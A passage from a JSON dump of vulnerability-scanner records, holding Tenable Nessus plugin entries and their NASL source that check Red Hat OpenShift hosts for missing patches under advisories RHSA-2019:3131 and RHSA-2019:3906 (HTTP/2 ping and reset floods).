value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-efs-provisioner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-local-provisioner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-manila-provisioner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-snapshot-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-snapshot-provisioner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pivot\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(7|8)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x / 8.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:3131\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL7\", rpm:\"atomic-openshift-\") || rpm_exists(release:\"RHEL8\", rpm:\"atomic-openshift-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"OpenShift\");\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cri-o-1.13.11-0.10.dev.rhaos4.1.gitbdeb2ca.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cri-o-debuginfo-1.13.11-0.10.dev.rhaos4.1.gitbdeb2ca.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cri-tools-1.13.0-2.rhaos4.1.gitc06001f.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cri-tools-debuginfo-1.13.0-2.rhaos4.1.gitc06001f.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"faq-0.0.6-4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"faq-debuginfo-0.0.6-4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-cephfs-provisioner-0.0.2-7.gitd3c94f0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-debuginfo-0.0.2-7.gitd3c94f0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-efs-provisioner-0.0.2-7.gitd3c94f0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-local-provisioner-0.0.2-7.gitd3c94f0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-manila-provisioner-0.0.2-7.gitd3c94f0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-snapshot-controller-0.0.2-7.gitd3c94f0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-snapshot-provisioner-0.0.2-7.gitd3c94f0.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"cri-o-1.13.11-0.13.dev.rhaos4.1.gitbdeb2ca.el8\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"cri-tools-1.13.0-3.rhaos4.1.gitb69a0b9.el8\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"ignition-0.32.0-2.git5941fc0.el8\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"ignition-validate-0.32.0-2.git5941fc0.el8\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"pivot-0.0.5-2.el8\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cri-o / cri-o-debuginfo / cri-tools / cri-tools-debuginfo / faq / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:33:37", "description": "An update is now available for Red Hat OpenShift Container Platform 3.11.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.\n\nThe following RPM packages have been rebuilt with updated version of Go, which includes the security fixes listed further below :\n\natomic-enterprise-service-catalog atomic-openshift-cluster-autoscaler atomic-openshift-descheduler atomic-openshift-metrics-server atomic-openshift-node-problem-detector atomic-openshift-service-idler atomic-openshift-web-console cockpit csi-attacher csi-driver-registrar csi-livenessprobe csi-provisioner golang-github-openshift-oauth-proxy golang-github-openshift-prometheus-alert-buffer golang-github-prometheus-alertmanager golang-github-prometheus-node_exporter golang-github-prometheus-prometheus hawkular-openshift-agent heapster image-inspector openshift-enterprise-autoheal openshift-enterprise-cluster-capacity openshift-eventrouter openshift-external-storage\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-11-20T00:00:00", "type": "nessus", "title": "RHEL 7 : OpenShift Container Platform 3.11 HTTP/2 (RHSA-2019:3906) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:atomic-enterprise-service-catalog", "p-cpe:/a:redhat:enterprise_linux:atomic-enterprise-service-catalog-svcat", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-cluster-autoscaler", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-descheduler", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-metrics-server", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-node-problem-detector", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-service-idler", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-web-console", "p-cpe:/a:redhat:enterprise_linux:cockpit-debuginfo", "p-cpe:/a:redhat:enterprise_linux:cockpit-kubernetes", "p-cpe:/a:redhat:enterprise_linux:csi-attacher", "p-cpe:/a:redhat:enterprise_linux:csi-attacher-debuginfo", "p-cpe:/a:redhat:enterprise_linux:csi-driver-registrar", "p-cpe:/a:redhat:enterprise_linux:csi-driver-registrar-debuginfo", "p-cpe:/a:redhat:enterprise_linux:csi-livenessprobe", "p-cpe:/a:redhat:enterprise_linux:csi-livenessprobe-debuginfo", "p-cpe:/a:redhat:enterprise_linux:csi-provisioner", "p-cpe:/a:redhat:enterprise_linux:csi-provisioner-debuginfo", "p-cpe:/a:redhat:enterprise_linux:golang-github-openshift-oauth-proxy", "p-cpe:/a:redhat:enterprise_linux:golang-github-openshift-prometheus-alert-buffer", "p-cpe:/a:redhat:enterprise_linux:hawkular-openshift-agent", "p-cpe:/a:redhat:enterprise_linux:heapster", "p-cpe:/a:redhat:enterprise_linux:image-inspector", "p-cpe:/a:redhat:enterprise_linux:openshift-enterprise-autoheal", "p-cpe:/a:redhat:enterprise_linux:openshift-enterprise-cluster-capacity", "p-cpe:/a:redhat:enterprise_linux:openshift-eventrouter", "p-cpe:/a:redhat:enterprise_linux:openshift-eventrouter-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-cephfs-provisioner", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-efs-provisioner", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-local-provisioner", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-manila-provisioner", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-snapshot-controller", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-snapshot-provisioner", "p-cpe:/a:redhat:enterprise_linux:prometheus", "p-cpe:/a:redhat:enterprise_linux:prometheus-alertmanager", "p-cpe:/a:redhat:enterprise_linux:prometheus-node-exporter", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2019-3906.NASL", "href": "https://www.tenable.com/plugins/nessus/131154", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:3906. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131154);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:3906\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.11 HTTP/2 (RHSA-2019:3906) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update is now available for Red Hat OpenShift Container Platform\n3.11.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or\nprivate cloud deployments.\n\nThe following RPM packages have been rebuilt with updated version of\nGo, which includes the security fixes listed further below :\n\natomic-enterprise-service-catalog atomic-openshift-cluster-autoscaler\natomic-openshift-descheduler atomic-openshift-metrics-server\natomic-openshift-node-problem-detector atomic-openshift-service-idler\natomic-openshift-web-console cockpit csi-attacher csi-driver-registrar\ncsi-livenessprobe csi-provisioner golang-github-openshift-oauth-proxy\ngolang-github-openshift-prometheus-alert-buffer\ngolang-github-prometheus-alertmanager\ngolang-github-prometheus-node_exporter\ngolang-github-prometheus-prometheus hawkular-openshift-agent heapster\nimage-inspector openshift-enterprise-autoheal\nopenshift-enterprise-cluster-capacity openshift-eventrouter\nopenshift-external-storage\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory\ngrowth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3906\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9514\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-enterprise-service-catalog\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-enterprise-service-catalog-svcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-cluster-autoscaler\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-descheduler\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-metrics-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-node-problem-detector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-service-idler\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-web-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cockpit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cockpit-kubernetes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:csi-attacher\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:csi-attacher-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:csi-driver-registrar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:csi-driver-registrar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:csi-livenessprobe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:csi-livenessprobe-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:csi-provisioner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:csi-provisioner-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-github-openshift-oauth-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-github-openshift-prometheus-alert-buffer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hawkular-openshift-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:heapster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:image-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-enterprise-autoheal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-enterprise-cluster-capacity\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-eventrouter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-eventrouter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-cephfs-provisioner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-efs-provisioner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-local-provisioner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-manila-provisioner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-snapshot-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-snapshot-provisioner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:prometheus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:prometheus-alertmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:prometheus-node-exporter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:3906\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_exists(rpm:\"atomic-enterprise-service-catalog-3.11\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-enterprise-service-catalog-3.11.154-1.git.1.fa68ced.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-enterprise-service-catalog-svcat-3.11\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-enterprise-service-catalog-svcat-3.11.154-1.git.1.fa68ced.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-cluster-autoscaler-3.11\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-cluster-autoscaler-3.11.154-1.git.1.532da7a.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-descheduler-3.11\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-descheduler-3.11.154-1.git.1.1d31032.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-metrics-server-3.11\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-metrics-server-3.11.154-1.git.1.6a6b6ce.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-node-problem-detector-3.11\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-node-problem-detector-3.11.154-1.git.1.5e8e065.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-service-idler-3.11\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-service-idler-3.11.154-1.git.1.f80fb86.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-web-console-3.11\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-web-console-3.11.154-1.git.1.f54cb18.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cockpit-debuginfo-195-2.rhaos.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cockpit-kubernetes-195-2.rhaos.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"csi-attacher-0.2.0-4.git27299be.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"csi-attacher-debuginfo-0.2.0-4.git27299be.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"csi-driver-registrar-0.2.0-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"csi-driver-registrar-debuginfo-0.2.0-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"csi-livenessprobe-0.0.1-2.gitff5b6a0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"csi-livenessprobe-debuginfo-0.0.1-2.gitff5b6a0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"csi-provisioner-0.2.0-3.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"csi-provisioner-debuginfo-0.2.0-3.el7\")) flag++;\n if (rpm_exists(rpm:\"golang-github-openshift-oauth-proxy-3.11\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"golang-github-openshift-oauth-proxy-3.11.154-1.git.1.220e3dc.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"golang-github-openshift-prometheus-alert-buffer-0-3.gitceca8c1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"hawkular-openshift-agent-1.2.2-3.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"heapster-1.3.0-4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"image-inspector-2.4.0-4.el7\")) flag++;\n if (rpm_exists(rpm:\"openshift-enterprise-autoheal-3.11\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-enterprise-autoheal-3.11.154-1.git.1.13199be.el7\")) flag++;\n if (rpm_exists(rpm:\"openshift-enterprise-cluster-capacity-3.11\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-enterprise-cluster-capacity-3.11.154-1.git.1.5798c2c.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-eventrouter-0.2-4.git7c289cc.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-eventrouter-debuginfo-0.2-4.git7c289cc.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-cephfs-provisioner-0.0.2-9.gitd3c94f0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-debuginfo-0.0.2-9.gitd3c94f0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-efs-provisioner-0.0.2-9.gitd3c94f0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-local-provisioner-0.0.2-9.gitd3c94f0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-manila-provisioner-0.0.2-9.gitd3c94f0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-snapshot-controller-0.0.2-9.gitd3c94f0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-snapshot-provisioner-0.0.2-9.gitd3c94f0.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"prometheus-3.11.154-1.git.1.148db48.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"prometheus-alertmanager-3.11.154-1.git.1.4acd2e6.el7\")) flag++;\n if (rpm_exists(rpm:\"prometheus-node-exporter-3.11\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"prometheus-node-exporter-3.11.154-1.git.1.bc9f224.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"atomic-enterprise-service-catalog / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:05:17", "description": "From Red Hat Security Advisory 